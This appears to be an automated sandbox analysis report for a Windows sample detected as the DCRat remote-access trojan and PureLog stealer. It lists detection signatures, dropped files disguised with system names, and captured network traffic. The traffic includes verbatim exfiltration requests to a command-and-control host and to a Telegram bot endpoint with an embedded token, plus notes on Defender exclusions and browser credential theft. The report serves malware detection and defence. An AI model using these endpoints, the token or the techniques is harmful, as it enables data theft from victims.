Windows Analysis Report
Vqzx4PFehn.exe

Overview

General Information

Sample name: Vqzx4PFehn.exe
renamed because original name is a hash value
Original sample name: 1925339cab9e6a65f43c5f04321156e2.exe
Analysis ID: 1433033
MD5: 1925339cab9e6a65f43c5f04321156e2
SHA1: 16fc99e39d5dd91b915da5ffb969f56597d54c06
SHA256: fb2e3a0d29ae08e964de8bcc1cf986b3a6b928d13e14368cc31535236afd024e
Tags: DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\uCFUtfTN.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\fJkHwTWu.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\services.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\nntxgNlb.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EqkKdrOv.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\28moAYly7n.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\Registration\csrss.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows Defender\services.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\services.exe Virustotal: Detection: 65% Perma Link
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Virustotal: Detection: 65% Perma Link
Source: C:\Recovery\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Recovery\XXPWErhsUbDrk.exe Virustotal: Detection: 65% Perma Link
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Virustotal: Detection: 65% Perma Link
Source: C:\Users\user\Desktop\DtICHrzA.log Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\Desktop\EqkKdrOv.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\EqkKdrOv.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\SHKzphsQ.log Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\Desktop\TQvqMYlM.log Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\Desktop\fJkHwTWu.log Virustotal: Detection: 19% Perma Link
Source: C:\Users\user\Desktop\mqRpKNWg.log Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\Desktop\nntxgNlb.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\nntxgNlb.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\uCFUtfTN.log Virustotal: Detection: 19% Perma Link
Source: C:\Windows\Registration\csrss.exe ReversingLabs: Detection: 83%
Source: C:\Windows\Registration\csrss.exe Virustotal: Detection: 65% Perma Link
Source: C:\portintosvc\driverInto.exe ReversingLabs: Detection: 83%
Source: C:\portintosvc\driverInto.exe Virustotal: Detection: 65% Perma Link
Multi AV Scanner detection for submitted file
Source: Vqzx4PFehn.exe ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe Virustotal: Detection: 70% Perma Link
Machine Learning detection for dropped file
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\services.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TQvqMYlM.log Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SHKzphsQ.log Joe Sandbox ML: detected
Source: C:\Windows\Registration\csrss.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Vqzx4PFehn.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Vqzx4PFehn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Jump to behavior
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a Jump to behavior
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: Vqzx4PFehn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0100A69B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0101C220
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 172.67.144.153:80
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381"Host: api.telegram.orgContent-Length: 98854Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e318265f-a5ec-49e0-abbc-3a95e0368c35"Host: api.telegram.orgContent-Length: 98799Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 249068Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1772Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1760Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
